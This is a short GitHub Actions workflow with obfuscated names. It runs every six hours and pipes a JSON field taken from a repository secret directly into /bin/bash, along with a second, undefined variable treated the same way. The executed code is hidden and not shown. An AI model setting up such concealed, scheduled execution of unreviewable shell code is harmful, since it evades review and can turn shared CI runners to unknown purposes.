name: budajian3691

on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: budajian3691
        env:
          js65733: ${{ secrets.js65733 }}
        run: |
          echo $js65733 | jq -r .ghrj2 | /bin/bash
          echo $zisrc3 | jq -r .nrrc6292 | /bin/bash

